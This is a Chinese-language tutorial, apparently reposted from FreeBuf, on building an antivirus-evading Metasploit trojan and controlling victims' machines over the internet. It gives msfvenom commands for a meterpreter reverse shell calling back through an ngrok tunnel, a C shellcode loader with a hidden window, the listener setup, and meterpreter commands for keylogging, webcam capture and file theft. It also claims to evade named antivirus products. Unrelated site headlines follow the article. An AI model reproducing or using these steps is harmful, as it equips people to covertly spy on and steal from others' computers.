Metasploit實驗:製作免殺payload+對任意「外網」主機的遠控
*本文只做技術交流之用,技術無罪,希望大家知法懂法,更要守法
我發一個文件,你電腦就被我控制了,我可以拍照攝像下載文件,殺毒軟體也不管用!
這是怎麼做到的呢?
這個問題的實現需要拆分成下面三個模塊
內網穿透到外網
製作免殺木馬後門
Metasploit控制客戶機
環境準備
操作系統 | 用途 | IP地址 | 需要軟體 |
---|---|---|---|
Kali | 製作payload,攻擊,映射埠 | 192.168.1.130 | Metasploit Ngrok |
Win7 | 製作payload | 省略 | VC++6.0 |
Win10 | 客戶機 | 任意公網地址 | 無 |
內網穿透到外網
首先我們需要下載一個用於內網穿透的工具來進行埠映射與轉發。
這裡我用的是linux64bit
https://www.ngrok.cc/#down-client
接下來在上面的網站自行註冊申請,然後登陸。
然後申請免費隧道,選擇TCP協議,自定義遠程埠,本地IP地址就是kali的IP地址,埠自定義,但不要衝突。
這裡請記住隧道id,以及自定義遠程埠,kali本機埠
將下載的客戶端放置於指定目錄,cd到目錄,在命令行運行ngrok
./sunny clientid 隧道id
這樣就完成了埠映射,它能將外網埠接收到的數據返回到本機kali的指定埠。內網穿透的用途很多,下面給出說明,這裡不再贅述。
https://ngrok.com/docs
製作免殺木馬後門
首先,在kali中用msfvenom生成一個payload
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b 『x00』lhost=server.ngrok.cc lport=11206 -f c
上面命令中,-p選擇指定payload,–e選擇制定編碼器(不同編碼器免殺效果也有不同,部分編碼器應對火絨等殺軟效果顯著), -i 編碼次數,-b 去多餘/壞字元,lhost是你申請的ngrok伺服器地址 lport是自定義的遠程埠,-f 生成指定格式。
我這裡選擇生成基於C語言的數組,當然你也可以用以下命令直接得到exe木馬,但這樣免殺效果會打折扣,經筆者測試多次,重複編碼12次後免殺效果非常強大!
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b 『x00』lhost=server.ngrok.cc lport=11206 -f exe > haya.exe
然後複製buf數組
在win7下用VC6.0對下面代碼進行編譯,得到木馬。
#include
#pragmacomment( linker, 「/subsystem:」windows」 /entry:」mainCRTStartup」")//運行時不顯示窗口
unsignedchar buf[] =
「buf數組」;//將複製的數組粘貼到此處
main()
{
((void(*)(void))&buf)();
}
Metasploit控制客戶機
切到Kali,使用Metasploit進行監聽。
設置監聽攻擊模塊,監聽載荷,IP(kali本機),埠(ngrok里自定義的本地埠),然後exp。
use exploit/multi/handler
set payloadswindows/meterpreter/reverset_tcp
set lhost 192.168.1.130
set lport 12345
exploit
當客戶機執行木馬後,得到一個meterpreter,可以進行的操作你懂的哈哈。
list一些meterpreter的常用命令。
Download(upload) path | 下載(上傳)指定目錄文件 |
---|---|
ps | 列出當前系統進程 |
Kill uid | 消滅指定uid系統進程 |
keyscan_start | 開始鍵盤記錄軟體 |
webcam_snap | 拍照 |
截屏 | screenshot |
關於隱藏木馬,加陌生殼,自啟動,文件包含,進程轉移等各種姿勢加強木馬強度就需要大家自行測試了
通入上述步驟得到的木馬經過筆者測試可以通過
360,騰訊管家,Windows defender,小紅傘
等殺毒軟體的查殺。動態免殺中,對於360
,如果exe沒有放在C盤或者U盤運行就可以做到動態免殺,僅僅會在拍照等特敏感操作會有提示,其他操作全程不報毒,defender
和騰訊管家
就更弱了,拍照也不會有任何提示。後記:通過此次實驗,更加了解了信息安全的重要性。免殺和殺軟是永遠的對頭,但是兩者相互抗衡其實加速了安全行業的發展,沒有絕對安全的系統,攻防相互對立卻又彼此依存,攻防應合一。
文章參考:
http://blog.csdn.net/lzhd24/article/details/50664342
http://www.freebuf.com/sectool/118714.html
http://www.hackdig.com/?03/hack-2030.htm
*本文作者:haya,轉載請註明FreeBuf.COM
※長沙同升湖實驗學校連續17年舉行「送考節」 為考生壯行
※上海老股民實驗過萬次得出的抄底秘訣,獻給所有被套散戶!
※二戰日本所抓俘虜,有的做細菌實驗,有的做「良種」實驗
※這場公開的人體實驗簡直令人作嘔,但真相卻令所有人都沉默了
※來騰訊雲開發者實驗室 學習.NET
TAG:實驗 |
※Angelababy外網無P圖曝光,這顏值······
※免梯子訪問外網,上Google,看YouTube極致不卡
※#VansChallenge火遍外網!今天你扔鞋了嗎?
※Oculus Quest外網測評:歡迎來到綠洲
※外網評選泰國最火的5對cp,james ji和Grate上榜,引腐女尖叫連連
※Windows自帶最實用的網路命令——Route 雙網卡內外網同時在線
※外網分享最全的lalylala編織玩偶圖集
※LOL:外網評EDG與RNG世紀大戰 Uzi再見下一把上Heart與Kezman
※Angelababy外網無修圖成李小璐,原來美顏保持都靠P圖!
※Meme:調侃 AirPod 用戶成了國外網友現在最快樂的事
※外網無修圖都這麼美,Angelababy的顏值真的太能打了!
※泰星Mai出席Michael kors2018秋冬紐約大秀,美顏無懼外網鏡頭
※落夜-Arboreal外網風靡提花套衫
※打招呼用"how are you"究竟對不對?我在外網試了下,結果......
※沒有faker的SKT四連勝了!海外網友熱議:SKT不配擁有faker!
※國內外網友吐槽iPhone XS/Max信號不給力:你遇到沒?
※無法駕馭酷睿i9?外網友稱新Macbook有散熱問題
※配置 redis 外網可訪問
※KT雙殺Gen.G,國外網友熱議:這不是我認識的Deft
※國外網友將新買的iPhoneXSMax,被丟進退役的核電站!